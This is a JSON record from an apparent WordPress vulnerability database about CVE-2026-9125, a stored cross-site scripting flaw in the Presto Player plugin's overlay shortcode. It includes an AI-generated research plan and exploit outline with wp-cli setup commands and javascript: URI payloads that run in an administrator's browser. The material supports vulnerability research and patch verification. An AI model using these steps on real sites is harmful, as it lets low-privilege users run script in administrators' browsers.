[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f9bP0s-kWLSGXYgCmyoqrohUAxcAd7U_MZSLRzRVMf3A":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":9,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":40},"CVE-2026-9125","the-ultimate-video-player-for-wordpress-authenticated-contributor-stored-cross-site-scripting-via-linkurl-shortcode-attr","The Ultimate Video Player For WordPress \u003C= 4.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'link_url' Shortcode Attribute","The Presto Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link_url' parameter of the [presto_player_overlay] shortcode in versions up to, and including, 4.2.0 This is due to insufficient input sanitization and output escaping in the getOverlays() function, which copies the link_url shortcode attribute directly into the overlay configuration without scheme validation, allowing javascript: URIs to survive and be rendered as the href of a clickable anchor element by the presto-dynamic-overlay-ui web component. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","presto-player",null,"\u003C=4.2.0","4.2.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-06-11 12:49:42","2026-06-12 01:28:02",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fc87e7f50-f14a-4751-abcb-3a5bdd214889?source=api-prod",1,[22,23,24,25,26,27,28,29],"dist\u002Fcomponents\u002Fstats.json","dist\u002Fdashboard-rtl.css","dist\u002Fdashboard.asset.php","dist\u002Fdashboard.css","dist\u002Fdashboard.js","dist\u002Ftailwind-rtl.css","dist\u002Ftailwind.asset.php","dist\u002Ftailwind.css","researched",false,3,"This research plan outlines the technical steps to analyze and exploit **CVE-2026-9125**, a Stored Cross-Site Scripting (XSS) vulnerability in the Presto Player plugin for WordPress.\n\n## 1. Vulnerability Summary\nThe **Presto Player** plugin (versions \u003C= 4.2.0) contains a Stored XSS vulnerability within the `[presto_player_overlay]` shortcode. The vulnerability arises because the `link_url` attribute is processed by the `getOverlays()` function (inferred PHP logic) and passed to the frontend without sufficient sanitization or scheme validation (e.g., failing to use `esc_url()`). Specifically, `javascript:` URIs are permitted to persist and are rendered as the `href` attribute of an anchor element within the `presto-dynamic-overlay-ui` web component. An attacker with Contributor-level privileges can inject malicious scripts that execute when a user clicks the affected overlay.\n\n## 2. Attack Vector Analysis\n- **Shortcode:** `[presto_player_overlay]`\n- **Vulnerable Attribute:** `link_url`\n- **Payload Type:** `javascript:` protocol URI.\n- **Authentication:** Authenticated (Contributor or higher).\n- **Precondition:** The attacker must be able to create or edit a post\u002Fpage and insert shortcodes. \n- **Endpoint:** Post creation\u002Fupdate via Gutenberg editor (REST API) or Classic Editor.\n- **Sink:** The `href` attribute of a clickable anchor tag in the `presto-dynamic-overlay-ui` component.\n\n## 3. Code Flow (Inferred)\n1. **Registration:** The plugin registers the `[presto_player_overlay]` shortcode using `add_shortcode`.\n2. **Parsing:** When a page containing the shortcode is rendered, the callback function (likely involving `getOverlays()`) parses the attributes.\n3. **Storage\u002FTransfer:** The raw `link_url` value is stored in a configuration object or passed as a property to the web component.\n4. **Rendering:** In `dist\u002Fcollection\u002Fcomponents\u002Fcore\u002Ffeatures\u002Fpresto-dynamic-overlays\u002Fui\u002Fpresto-dynamic-overlay-ui.js` (referenced in `stats.json`), the component creates an anchor element:\n   ```javascript\n   \u002F\u002F Pseudo-code representation of the web component UI logic\n   render() {\n     return h('a', { href: this.overlayConfig.link_url }, ...);\n   }\n   ```\n5. **Execution:** Since `link_url` is not validated against a protocol allowlist, `javascript:alert(1)` is rendered as `\u003Ca href=\"javascript:alert(1)\">`. Clicking the overlay triggers the script.\n\n## 4. Nonce Acquisition Strategy\nWhile shortcodes themselves do not require nonces for frontend execution, **saving** the post containing the shortcode via the REST API requires a `_wpnonce`.\n\n1. **Shortcode Context:** The plugin likely enqueues its dashboard or player scripts on pages where the player is active.\n2. **Strategy:** \n   - Use `wp post create` via CLI to set up a post with the shortcode. This avoids manual nonce handling for the initial setup.\n   - If manual REST API interaction is required, navigate to the WordPress Dashboard (`\u002Fwp-admin\u002Findex.php`) using `browser_navigate`.\n   - Use `browser_eval` to extract the REST nonce from the standard WordPress `wpApiSettings` object:\n     ```javascript\n     browser_eval(\"window.wpApiSettings?.nonce\")\n     ```\n   - Alternatively, if the plugin localizes its own nonces, check the `presto_player` or `presto_player_overlay` JS objects.\n\n## 5. Exploitation Strategy\nThe goal is to inject a payload that executes in the context of an administrator viewing the post.\n\n1. **Setup:** Create a Contributor user.\n2. **Payload Crafting:** Use a standard XSS payload wrapped in the `javascript:` protocol:\n   - `javascript:alert(document.domain)`\n3. **Injection:** As the Contributor, create a post containing the malicious shortcode.\n   - **Note:** The overlay likely needs visibility triggers (like `time=\"0\"`) to appear.\n   - Shortcode: `[presto_player_overlay link_url=\"javascript:alert(origin)\" text=\"Click Me\" time=\"0\"]` (attributes inferred).\n4. **Trigger:** Log in as an Administrator and navigate to the published post.\n5. **Execution:** Click the rendered overlay element.\n\n## 6. Test Data Setup\nBefore exploitation, configure the environment:\n\n```bash\n# 1. Install and activate the affected version of Presto Player (\u003C= 4.2.0)\n# (Assuming the plugin is already provided or installed in the environment)\n\n# 2. Create a Contributor user\nwp user create attacker attacker@example.com --role=contributor --user_pass=password123\n\n# 3. Create a post with the vulnerable shortcode as the Contributor\n# We use wp-cli to simplify the \"Storage\" phase\nwp post create \\\n  --post_type=post \\\n  --post_status=publish \\\n  --post_title=\"Free Video Lesson\" \\\n  --post_author=$(wp user get attacker --field=ID) \\\n  --post_content='[presto_player_overlay link_url=\"javascript:alert(document.domain)\" text=\"Exclusive Content - Click Here\" time=\"0\"]'\n```\n\n## 7. Expected Results\n- The shortcode should be rendered by the plugin on the frontend.\n- Inspecting the HTML of the overlay should reveal an `\u003Ca>` tag with `href=\"javascript:alert(document.domain)\"`.\n- Clicking the overlay should trigger a browser alert showing the domain, confirming arbitrary JavaScript execution.\n\n## 8. Verification Steps\nAfter performing the HTTP request (as an Admin), verify the state:\n1. **Inspect Content:** Verify the shortcode remains unescaped in the database.\n   ```bash\n   wp post get \u003CPOST_ID> --field=post_content\n   ```\n2. **DOM Check:** Using `browser_eval`, check if the anchor tag exists with the malicious href:\n   ```javascript\n   browser_eval(\"document.querySelector('presto-dynamic-overlay-ui a')?.href\")\n   ```\n\n## 9. Alternative Approaches\nIf the `link_url` is reflected in a non-anchor context or if standard shortcode placement is restricted:\n- **Block Editor (Gutenberg):** Attempt to inject the payload via the Presto Player blocks (e.g., Overlay Block) if the shortcode is generated via the block editor.\n- **Data Attributes:** Check if the payload survives within a JSON configuration string inside a `data-` attribute, which might be processed by `JSON.parse()` and then rendered to the DOM using `.innerHTML` or similar sinks.","The Presto Player plugin for WordPress (\u003C= 4.2.0) is vulnerable to Stored Cross-Site Scripting via the 'link_url' attribute of the [presto_player_overlay] shortcode. Due to insufficient sanitization and URL scheme validation in the getOverlays() function, an authenticated attacker with contributor-level access can inject malicious 'javascript:' URIs that are rendered as clickable links, leading to script execution when a user interacts with the overlay.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpresto-player\u002F4.2.0\u002Fdist\u002Fcomponents\u002Fstats.json \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpresto-player\u002F4.2.1\u002Fdist\u002Fcomponents\u002Fstats.json\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpresto-player\u002F4.2.0\u002Fdist\u002Fcomponents\u002Fstats.json\t2026-05-21 04:00:08.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpresto-player\u002F4.2.1\u002Fdist\u002Fcomponents\u002Fstats.json\t2026-05-29 09:31:04.000000000 +0000\n@@ -1,5 +1,5 @@\n {\n-  \"timestamp\": \"2026-05-21T03:54:08\",\n+  \"timestamp\": \"2026-05-29T09:28:34\",\n   \"compiler\": {\n     \"name\": \"node\",\n     \"version\": \"17.9.1\"\n@@ -1 +1 @@\n-\u003C?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wp-api-fetch', 'wp-core-data', 'wp-data', 'wp-element', 'wp-i18n', 'wp-url'), 'version' => '4ea972b87befa5b8557d');\n+\u003C?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wp-api-fetch', 'wp-core-data', 'wp-data', 'wp-element', 'wp-i18n', 'wp-url'), 'version' => '63a8acd4fb2275d9ed21');","1. Gain Contributor-level access to the WordPress site.\n2. Create or edit a post and insert the `[presto_player_overlay]` shortcode.\n3. Craft a payload by setting the `link_url` attribute to a `javascript:` URI (e.g., `link_url=\"javascript:alert(origin)\"`).\n4. Ensure the overlay is visible by setting additional attributes like `time=\"0\"` and `text=\"Click Me\"`.\n5. Save the post and wait for a victim with higher privileges (such as an administrator) to view the page.\n6. When the victim clicks the rendered overlay, the injected JavaScript executes in their browser context.","gemini-3-flash-preview","2026-06-26 00:54:47","2026-06-26 00:55:34",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","4.2.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpresto-player\u002Ftags\u002F4.2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpresto-player.4.2.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpresto-player\u002Ftags\u002F4.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpresto-player.4.2.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpresto-player\u002Ftags"]